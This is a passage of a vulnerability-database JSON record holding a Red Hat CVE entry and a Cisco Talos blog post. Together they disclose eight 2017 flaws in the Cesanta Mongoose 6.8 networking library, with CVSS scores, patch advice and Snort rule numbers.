overflow, leading to a heap buffer overflow and resulting in denial of service and potential remote code execution. An attacker needs to send a specially crafted websocket packet over network to trigger this vulnerability.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-20T23:55:38", "type": "redhatcve", "title": "CVE-2017-2921", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2891", "CVE-2017-2892", "CVE-2017-2893", "CVE-2017-2894", "CVE-2017-2895", "CVE-2017-2909", "CVE-2017-2921", "CVE-2017-2922"], "modified": "2022-05-20T23:55:38", "id": "RH:CVE-2017-2921", "href": "https://access.redhat.com/security/cve/cve-2017-2921", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "talosblog": [{"lastseen": "2017-12-25T19:52:52", "description": "<i>These vulnerabilities were discovered by Aleksandar Nikolic of Cisco Talos</i><br /><br />Today, Talos is disclosing several vulnerabilities that have been identified in Cesanta Mongoose server. <br /><br />Cesanta Mongoose is a library implementing a number of networking protocols, including HTTP, MQTT, MDNS and others. It is designed with embedded devices in mind and as such is used in many IoT devices and runs on virtually all popular IoT platforms. The small size of the software enables any Internet-connected device to function as a web server. Mongoose is available under GPL v2 and commercial licenses.<br /> All these discovered vulnerabilities are fixed in version <a href=\"https://github.com/cesanta/mongoose/releases/tag/6.10\">6.10</a> of the library. <br /><br /><a name='more'></a><br /><br /><h2 id=\"h.t35gb7jnv6c3\">Vulnerability Details</h2><br /><h3 id=\"h.p7ist89g16m5\">TALOS-2017-0398 (CVE-2017-2891) - Cesanta Mongoose HTTP Server CGI Remote Code Execution Vulnerability</h3><br /><a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0398\">TALOS-2017-0398</a> manifests itself as an exploitable use-after-free vulnerability that exists in the HTTP server implementation of Cesanta Mongoose 6.8. An ordinary HTTP POST request with a CGI target can cause a reuse of a previously freed pointer potentially resulting in remote code execution. An attacker needs to send this HTTP request over the network to trigger this vulnerability.<br /><br /><h3 id=\"h.bm8o08jc6uoq\">TALOS-2017-0399 (CVE-2017-2892) - Cesanta Mongoose MQTT Payload Length Remote Code Execution</h3><br /><a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0399\">TALOS-2017-0399</a> manifests itself as an exploitable arbitrary memory read vulnerability that exists in the MQTT packet parsing functionality of Cesanta Mongoose 6.8. A specially crafted MQTT packet can cause an out of bounds and arbitrary memory read and write, potentially resulting in information disclosure, denial of service and remote code execution. An attacker needs to send a specially crafted MQTT packet over the network to trigger this vulnerability.<br /><br /><h3 id=\"h.nlmk6epmqnt6\">TALOS-2017-0400 (CVE-2017-2893) - Cesanta Mongoose MQTT SUBSCRIBE Command Denial Of Service</h3><br /><a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0400\">TALOS-2017-0400</a> describes an exploitable NULL pointer dereference vulnerability that exists in the MQTT packet parsing functionality of Cesanta Mongoose 6.8. An MQTT SUBSCRIBE packet can cause a NULL pointer dereference leading to a server crash and denial of service. An attacker needs to send a specially crafted MQTT packet over the network to trigger this vulnerability.<br /><br /><h3 id=\"h.8tgqw5hpxxx3\">TALOS-2017-0401 (CVE-2017-2894) - Cesanta Mongoose MQTT SUBSCRIBE Multiple Topics Remote Code Execution</h3><br /><a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0401\">TALOS-2017-0401</a> is an exploitable stack buffer overflow vulnerability that exists in the MQTT packet parsing functionality of Cesanta Mongoose 6.8. A specially crafted MQTT SUBSCRIBE packet can cause a stack buffer overflow resulting in remote code execution. An attacker needs to send a specially crafted MQTT packet over the network to trigger this vulnerability.<br /><br /><h3 id=\"h.cx86aeyjt9mm\">TALOS-2017-0402 (CVE-2017-2895) - Cesanta Mongoose MQTT SUBSCRIBE Topic Length Information Leak</h3><br /><a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0402\">TALOS-2017-0402</a> documents an exploitable arbitrary memory read vulnerability that exists in the MQTT packet parsing functionality of Cesanta Mongoose 6.8. A specially crafted MQTT SUBSCRIBE packet can cause an out of bounds and arbitrary memory read potentially resulting in information disclosure and denial of service. An attacker needs to send a specially crafted MQTT packet over the network to trigger this vulnerability.<br /><br /><h3 id=\"h.cr2a58dhmjy1\">TALOS-2017-0416 (CVE-2017-2909) - Cesanta Mongoose DNS Query Compressed Name Pointer Denial Of Service</h3><br /><a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0416\">TALOS-2017-0416</a> describes an infinite loop programming error that exists in the DNS server functionality of Cesanta Mongoose 6.8 library. A specially crafted DNS request can cause an infinite loop resulting in high CPU usage and Denial Of Service. An attacker can send a packet over the network to trigger this vulnerability. <br /><br /><h3 id=\"h.yl3fl4awfow9\">TALOS-2017-0428 (CVE-2017-2921) - Cesanta Mongoose Websocket Protocol Packet Length Code Execution Vulnerability</h3><br /><a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0428\">TALOS-2017-0428</a> is an exploitable memory corruption vulnerability that exists in the Websocket protocol implementation of Cesanta Mongoose 6.8. A specially crafted websocket packet can cause an integer overflow leading to a heap buffer overflow resulting in denial of service and potentially remote code execution. An attacker may be able to send a specially crafted websocket packet over the network to trigger this vulnerability.<br /><br /><h3 id=\"h.dj3eivlw70fj\">TALOS-2017-0429 (CVE-2017-2922) - Cesanta Mongoose Websocket Protocol Fragmented Packet Code Execution Vulnerability</h3><br /><a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0429\">TALOS-2017-0429</a> describes an exploitable memory corruption vulnerability that exists in the Websocket protocol implementation of Cesanta Mongoose 6.8. A specially crafted websocket packet can cause a buffer to be allocated while leaving stale pointers which can lead to use-after-free vulnerability that can be exploited to achieve remote code execution. An attacker may be able to send a specially crafted websocket packet over the network to trigger this vulnerability.<br /><br />For the full technical details of these vulnerabilities, please refer to the vulnerability advisories that are posted on our website:<br /><br /><a href=\"http://www.talosintelligence.com/vulnerability-reports/\">http://www.talosintelligence.com/vulnerability-reports/</a><br /><br /><h2 id=\"h.f31c7khmn6lo\">Discussion</h2><br />IoT devices often have limited processing and memory resources but they also require lightweight and resilient communications protocols. One of the protocols frequently used for IoT and mobile messaging applications is MQ Telemetry Transport (MQTT).<br /><br /><a href=\"http://docs.oasis-open.org/mqtt/mqtt/v3.1.1/os/mqtt-v3.1.1-os.html\">MQTT</a> is a lightweight network protocol used for publish/subscribe messaging between devices. MQTT is a standard protocol accepted by the OASIS consortium for the adoption of open standards. <br /><br />The protocol is designed to be open, simple and easy to implement, allowing thousands of lightweight clients to be supported by a single server. The design attempts to minimize bandwidth requirements while attempting to ensure reliability of delivery.<br /><br />Cesanta Mongoose is a popular communications library designed for implementation as a lightweight embedded library supporting several server and client application layer protocols, such as <a href=\"https://www.w3.org/Protocols/\">HTTP</a>, MQTT, <a href=\"https://www.w3.org/TR/2011/WD-websockets-20110929/\">WebSockets</a>, <a href=\"https://www.isc.org/community/rfcs/dns/\">DNS</a> and <a href=\"https://tools.ietf.org/html/rfc7252\">CoAP</a>. It is designed with embedded devices in mind and as such is used in many IoT devices and runs on virtually all popular IoT platforms.<br /><br />These vulnerabilities discovered by Talos may allow attackers to take over implementations of vulnerable versions of the Cesanta Mongoose server and control individual devices as well as the associated servers running it. Users are recommended to work with the affected device vendors to ensure that the latest security patches for Cesanta Mongoose are applied to all vulnerable devices and applications. <br /><br /><h2 id=\"h.610e9o9vgbc4\">Coverage</h2><br />The following Snort Rules detect attempts to exploit these vulnerabilities. Please note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For all current rule information, please refer to your Firepower Management Center or Snort.org.<br /><br />Snort Rules: <br /><br /><ul><li>23039 - 23040</li></ul><br /><br /><div class=\"feedflare\">\n<a href=\"http://feeds.feedburner.com/~ff/feedburner/Talos?a=geK06cY9cxs:QobJuzBhpB0:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/feedburner/Talos?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/feedburner/Talos/~4/geK06cY9cxs\" height=\"1\" width=\"1\" alt=\"\"/>", "cvss3": {}, "published": "2017-10-31T08:12:00", "type": "talosblog", "title": "Vulnerability Spotlight: Multiple Vulnerabilities in Cesanta Mongoose Server", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-2891", "CVE-2017-2892", "CVE-2017-2893", "CVE-2017-2894", "CVE-2017-2895", "CVE-2017-2909", "CVE-2017-2921", "CVE-2017-2922"], "modified": "2017-10-31T15:59:27", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/geK06cY9cxs/vulnerability-spotlight-multiple_31.html", "id": "TALOSBLOG:BF9B74979C194FA29647576078478DE0", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}]}
CVE-2017-2921
